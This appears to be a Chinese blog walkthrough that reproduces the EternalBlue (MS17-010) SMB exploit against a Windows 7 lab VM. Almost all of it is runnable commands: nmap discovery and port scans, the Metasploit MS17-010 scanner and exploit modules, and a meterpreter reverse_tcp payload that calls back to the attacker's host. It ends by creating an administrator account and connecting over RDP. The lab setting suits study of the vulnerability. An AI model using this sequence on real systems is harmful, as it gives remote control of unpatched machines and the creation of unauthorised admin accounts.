简单的讲解一下永恒之蓝的复现过程.在这个漏洞中利用的是445端口来进行攻击渗透的。
本次实验的环境:
攻击机为kali: 192.168.233.131
目标主机为windows 7 旗舰版:处于nat网络下的虚拟机 192.168.233.144
为了更方便的实现复现,关闭目标主机的防火墙,之后开启目标主机就没他什么事了
第一步老样子,探测同一局域网的存活主机:
nmap -sP 192.168.233.1/24
或者使用:
arp-scan -l
下一步就是用nmap进行端口探测:
nmap -sT -A -p0 192.168.233.144
这里我们看到有445以及3389端口可以进行利用,咱们这次主要是利用445端口来获取目标主机的meterpreter权限以及cmd权限
开始利用kali进行模块搜索:
search ms17_010
咱们这里主要就是用这两个来进行攻击的,一个是辅助模块用来检查远程主机是否含有这个漏洞的另一个是攻击模块了,可以直接拿到cm权限。
先利用辅助模块来验证一下是否存在着这个漏洞吧:
use auxiliary/scanner/smb/smb_ms17_010
show options
sset RHOSTS 192.168.233.144
run
发现是存在漏洞的:
利用攻击模块进行攻击:
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.233.144
exploit
这样可以直接拿到cmd权限,但是呢我现在想拿到meterpreter的shell应该怎么做呢?
有两种方法第一种比较麻烦,也不普遍:那就是用msfvenom 生成一个exe后门程序上传到目标主机上并在目标主机上运行,(这似乎有点难度)
所以我就用简单点的方法,就是选择攻击模块的时候,下一步选择一个meterpreter/reverse_tcp的一个payload
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.233.144
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.233.131
exploit
完成已经获取meterpreter
输入命令shell即可进入cmd权限,这是就可以直接创建管理员用户用kali来连接远程主机
rdesktop 192.168.233.144:3389
即可操作目标主机了